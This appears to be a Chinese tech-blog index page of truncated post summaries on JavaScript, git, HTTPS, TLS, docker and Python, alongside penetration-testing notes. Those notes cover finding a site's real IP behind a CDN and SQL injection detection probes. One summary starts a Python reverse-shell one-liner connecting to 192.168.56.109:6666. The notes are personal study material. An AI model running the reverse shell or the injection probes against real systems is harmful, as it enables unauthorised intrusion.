摘要： javascript 数据结构 数字 字符串 '\x41'; // 完全等同于 'A' '\u4e2d\u6587'; // 完全等同于 '中文' `用于包含多行字段 布尔值 运算符， == 与 不同，==会强制转换，1='1'为true；NaN与所有值都不同，包括自己，只有通过isNaN()函数才 阅读全文

摘要： git git add file.txt git commit -m “注释” 历史版本 git status git diff # 工作区与暂存区差异 git diff --caches # 暂存区与仓库差异 回退 HEAD 当前版本 HEAD^ 前一版本 HEAD~100 前100版本 git 阅读全文

摘要： http缺陷： 未经加密 未经认证 不能保证完整性 HTTPS 安全通信机制 在上述流程中，应用层发送数据时会附加MAC（报文摘要），检查报文是否被篡改。 认证方式 BASIC认证（基本认证） DIGEST认证（摘要认证） SSL客户端认证（一般结合表单认证） FormBase认证（基于表单认证） 阅读全文

摘要： CDN相关 11种绕过CDN查找真实IP方法 https://www.cnblogs.com/qiudabai/p/9763739.html 绕过CDN寻找真实IP的8种方法 https://www.cnblogs.com/xiaozi/p/12963549.html 绕过CDN查找网站真实ip h 阅读全文

摘要： python 装饰器 def log(func): @functools.wraps # 实现 wrapper.__name__ = func.__name__ def wrapper(*args, **kw): print("befor") ret = func() print("after") 阅读全文

摘要： SSL/TLS TLS协议由TLS记录协议与TLS握手协议叠加而成。底层的TLS记录协议负责加密，上层的TLS握手协议负责加密以外的工作。 TLS记录协议 位于TLS握手协议的下层，负责使用对称密码对消息加密。使用了对称加密与消息认证码，但具体的算法与共享密钥是通过握手协议在服务器与客户端之间协商决 阅读全文

摘要： docker 镜像管理 docker image pull alpin:latest docker image ls / docker images --filter xx=xx danging = true/false 返回(非)悬虚镜像 before 镜像名称或id since 镜像名称或id 阅读全文

摘要： 查找二级域名 让服务器给用户发包（如 邮件） 再查看原文 找到ip 敏感文件泄露 查询历史解析ip https://www.ip138.com/ app抓包 修改hosts文件绕过 11种绕过CDN查找真实IP方法 https://www.cnblogs.com/qiudabai/p/9763739 阅读全文

摘要： 本文记录kali不包含的工具 python -c 'import socket, subprocess, os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("192.168.56.109", 6666));os.d 阅读全文

摘要： SQLi 特殊字符： | | | | | | | | |0x3c62723e|换行符| | |0x7e|~ 在报错注入中防止截断| 五种检测方式 布尔型 and 1=1 -- 和 and 1=2 -- 时间型 错误型 输入一个 ‘ 造成错误，对盲注无效 联合型 基于union的联合查询，适用于后台通 阅读全文